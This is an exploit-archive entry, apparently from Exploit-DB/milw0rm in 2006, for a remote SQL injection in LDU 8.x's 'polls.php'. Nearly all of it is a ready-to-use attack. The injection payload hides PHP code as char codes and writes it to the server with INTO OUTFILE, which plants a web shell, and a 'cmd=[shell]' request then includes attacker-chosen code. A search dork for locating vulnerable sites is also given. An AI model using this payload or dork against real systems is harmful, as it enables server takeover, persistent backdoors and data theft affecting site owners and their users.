LDU 8.x - 'polls.php' SQL Injection

EDB-ID:

2871


Author:

ajann

Type:

webapps


Platform:

PHP

Date:

2006-11-30


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

*******************************************************************************
# Title   :  LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(
# Dork    :  "Powered by LDU"

*******************************************************************************

[[SQL]]]------------------------------------------------------

### http://[target]/[path]/polls.php?id=

Example:

//
polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,117,100,101,40,36,99,109,100,41,59,63,62)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.php'/*

.php?cmd=[shell]
"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-30]